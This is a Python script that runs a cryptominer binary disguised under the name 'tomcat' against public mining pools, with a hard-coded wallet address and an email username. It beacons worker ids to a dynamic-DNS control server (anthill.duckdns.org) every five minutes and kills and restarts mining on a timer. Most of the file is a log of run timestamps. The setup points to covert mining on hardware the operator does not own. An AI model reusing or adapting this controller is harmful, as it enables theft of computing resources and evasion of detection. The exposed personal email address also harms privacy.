import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:02.011815
#2018-02-17 17:01:05.215090
#2018-02-17 18:50:08.850646
#2018-02-17 20:37:03.801560
#2018-02-17 22:23:02.058990
#2018-02-18 00:07:07.093247
#2018-02-18 01:58:02.199986
#2018-02-18 03:45:08.782174
#2018-02-18 05:31:03.818828
#2018-02-18 07:22:06.982234
#2018-02-18 09:10:06.512196
#2018-02-18 10:56:02.218382
#2018-02-18 12:42:04.507447
#2018-02-18 14:29:06.255954
#2018-02-18 16:19:05.224240
#2018-02-18 18:08:06.931396
#2018-02-18 19:54:03.887163
#2018-02-18 21:40:07.145731
#2018-02-18 23:28:03.856759
#2018-02-19 01:15:05.617421
#2018-02-19 03:03:04.670964
#2018-02-19 04:49:07.047843
#2018-02-19 06:35:08.104654
#2018-02-19 08:24:03.928645
#2018-02-19 10:14:01.383822
#2018-02-19 12:02:07.621585
#2018-02-19 13:50:06.441095
#2018-02-19 15:40:07.701131
#2018-02-19 17:28:07.645680
#2018-02-19 19:15:10.356481
#2018-02-19 21:03:04.584353
#2018-02-19 22:51:05.224156
#2018-02-20 00:36:06.741933
#2018-02-20 02:24:06.200239
#2018-02-20 04:14:05.809645
#2018-02-20 05:57:05.616478
#2018-02-20 07:43:07.216198
#2018-02-20 09:27:08.721697
#2018-02-20 11:12:09.559307
#2018-02-20 12:59:06.703622
#2018-02-20 14:44:05.772580
#2018-02-20 16:33:12.780392
#2018-02-20 18:21:02.070863
#2018-02-20 20:11:06.159560
#2018-02-20 21:58:06.610229
#2018-02-20 23:38:07.469869
#2018-02-21 01:22:02.263368
#2018-02-21 03:11:07.441624
#2018-02-21 04:58:06.445709
#2018-02-21 06:47:01.821427
#2018-02-21 08:31:04.178555
#2018-02-21 10:17:02.076324
#2018-02-21 12:04:05.070258
#2018-02-21 13:53:10.059471
#2018-02-21 15:37:05.455001
#2018-02-21 17:29:08.297519
#2018-02-21 19:16:01.690964
#2018-02-21 21:04:01.485201
#2018-02-21 22:51:08.901983
#2018-02-22 00:41:08.248121
#2018-02-22 02:28:03.808484
#2018-02-22 04:15:01.992668
#2018-02-22 06:02:06.282058
#2018-02-22 07:48:01.952237
#2018-02-22 09:37:02.197960
#2018-02-22 11:23:07.372003
#2018-02-22 13:08:01.295790
#2018-02-22 14:56:06.649930
#2018-02-22 16:41:10.611812
#2018-02-22 18:27:06.498416
#2018-02-22 20:20:07.879968
#2018-02-22 22:07:05.739596
#2018-02-23 00:12:08.347907
#2018-02-23 02:01:02.134702
#2018-02-23 03:49:07.030641
#2018-02-23 05:42:05.520742
#2018-02-23 07:27:01.954047
#2018-02-23 09:30:04.828666
#2018-02-23 11:36:04.384040
#2018-02-23 13:26:01.631307
#2018-02-23 15:13:07.721055
#2018-02-23 17:03:08.911997
#2018-02-23 18:50:11.870847
#2018-02-23 20:35:09.919646
#2018-02-23 22:22:08.553147
#2018-02-24 00:08:01.544042
#2018-02-24 01:59:06.227247
#2018-02-24 03:50:06.474593
#2018-02-24 05:38:03.928217
#2018-02-24 07:26:06.385893
#2018-02-24 09:15:07.499189
#2018-02-24 11:04:06.535500
#2018-02-24 12:52:08.080913
#2018-02-24 14:40:07.534765
#2018-02-24 16:31:04.455199
#2018-02-24 18:21:06.669482
#2018-02-24 20:08:05.114272
#2018-02-24 21:51:04.070281
#2018-02-25 00:51:01.680691
#2018-02-25 04:38:04.304626
#2018-02-25 08:04:07.093798